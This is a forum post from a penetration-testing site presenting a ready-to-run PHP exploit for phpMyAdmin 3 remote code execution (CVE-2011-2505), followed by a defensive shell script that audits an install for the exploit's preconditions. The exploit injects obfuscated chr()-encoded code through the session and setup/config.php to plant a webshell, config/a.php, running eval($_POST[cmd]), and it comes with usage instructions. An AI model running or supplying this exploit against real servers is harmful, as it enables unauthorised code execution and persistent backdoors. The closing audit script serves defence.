中国网络渗透测试联盟

Title: phpMyAdmin3 remote code execute exploit, PHP version

Author: admin    Time: 2013-2-21 09:13
Title: phpMyAdmin3 remote code execute exploit, PHP version
I've been a full-time stay-at-home dad lately, out of touch with the scene for many months, and the blog hasn't been updated either.

Last night I was up all night with the kid and saw 黑哥's discussion of the phpMyAdmin3 vulnerability in the PHP security group. I hadn't read the vulnerable code before, but I had seen wofeiwo's exp on Weibo a while back, and 黑哥 said there was an exploitation method that wasn't so "chicken ribs" (low value), so during the night I dug through the code, studied it, and wrote this reheated exp. Since I got to it late and plenty of people had already studied it and written exps, mine is just leftovers, a bit of research to pass the time.

First, props to wofeiwo's Python version of the exp, and to the research spirit of wofeiwo and superhei, a model to learn from. That earlier exp, however, had some limitations in practice:
First, session.auto_start = 1;
Second, in pma3's default code the libraries directory is already blocked from direct access by .htaccess.
And of course a third one, the gap nobody can get across: the config directory must exist and be writable.

After reading 黑哥's remarks in the group and looking at the code again, I found the first two limitations can both be ignored. So this vulnerability really isn't that "chicken ribs" after all.

So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
 * (the phpMyAdmin cookie comes from the Set-Cookie header, the token from the page body)
 **/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 * The injected server "name" opens with "*" + "/" to close the comment setup/config.php
 * writes config.inc.php with, then runs the payload, then opens a new comment with "/*".
 * The chr() chain decodes to: fputs(fopen('a.php','w'),'<?php eval($_POST[cmd])?>');echo('t00ls');
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
 * Saving through setup/config.php serialises $_SESSION[ConfigFile] into config/config.inc.php.
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
 * Try to check if the webshell was created successfully
 * Requesting config/config.inc.php runs the injected code: it writes config/a.php and echoes "t00ls".
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

/**
 * Minimal raw HTTP/1.1 client: GET when $data is empty, POST otherwise.
 * Returns the whole response (status line, headers and body) as one string.
 **/
function php_request($url,$data='',$cookie=''){
    global $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    fclose($fp);
    return $resp;
}

?>
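The post calls a writable config directory the one barrier nobody can get around, and the exploit also needs setup/config.php reachable and (for the older exp) an unprotected libraries/ directory. The following is an added example, not code from the original post or from phpMyAdmin, written from the defender's side: a POSIX sh check that audits a local phpMyAdmin 3 install for exactly those three conditions. The install path argument, the default web user name "www-data" and the simplification that group membership is not resolved are all assumptions of this example.

```shell
#!/bin/sh
# Added example (not part of the original post or of phpMyAdmin): audit a
# phpMyAdmin 3 install for the preconditions the exploit above relies on.
# Assumptions: $1 is the phpMyAdmin document root, $2 the web server user
# (default "www-data"); group membership of that user is not resolved.

# pma_dir_mode DIR: print the 10-character mode field from ls, e.g. drwxrwxrwx
pma_dir_mode() {
    ls -ld "$1" | cut -c1-10
}

# pma_dir_owner DIR: print the owner field from ls
pma_dir_owner() {
    ls -ld "$1" | awk '{print $3}'
}

# pma_config_writable PMA_ROOT WEBUSER
#   0: config/ exists and WEBUSER can write to it (exploit precondition met)
#   1: config/ exists but its mode/owner do not let WEBUSER write to it
#   2: config/ does not exist
# Simplification: a group-writable config/ owned by someone else is reported
# as not writable, because WEBUSER's groups are not looked up.
pma_config_writable() {
    cfg="$1/config"
    user="$2"
    [ -d "$cfg" ] || return 2
    mode=$(pma_dir_mode "$cfg")
    owner=$(pma_dir_owner "$cfg")
    case "$mode" in
        ????????w?) return 0 ;;          # world-writable: anyone can drop config.inc.php
    esac
    if [ "$owner" = "$user" ]; then
        case "$mode" in
            ??w???????) return 0 ;;      # owned by the web user with u+w set
        esac
    fi
    return 1
}

# pma_audit PMA_ROOT [WEBUSER]: print one line per finding; the return value
# is the number of findings that favour the exploit (0 means none).
pma_audit() {
    root="$1"
    user="${2:-www-data}"
    risky=0
    if pma_config_writable "$root" "$user"; then
        echo "[!] $root/config is writable by $user: setup/config.php can write config/config.inc.php"
        risky=$((risky + 1))
    else
        echo "[ ] $root/config is absent or not writable by $user"
    fi
    if [ -f "$root/setup/config.php" ]; then
        echo "[!] setup/config.php is still present (the exploit posts to it)"
        risky=$((risky + 1))
    else
        echo "[ ] setup/config.php not present"
    fi
    if [ -f "$root/libraries/.htaccess" ]; then
        echo "[ ] libraries/.htaccess present (denies direct access to library files)"
    else
        echo "[!] libraries/.htaccess missing"
        risky=$((risky + 1))
    fi
    return "$risky"
}

# Usage (assumed path and user): sh pma_check.sh /var/www/pma www-data
if [ -n "${1:-}" ]; then
    pma_audit "$1" "${2:-www-data}"
fi
```

The mode and owner are read from `ls -ld` rather than `test -w` so the result describes what the web server user could do, not what the user running the check could do (as root, `test -w` is always true). Removing setup/ and making config/ unwritable, or deleting it, closes the precondition the post relies on regardless of how the session is reached.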




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2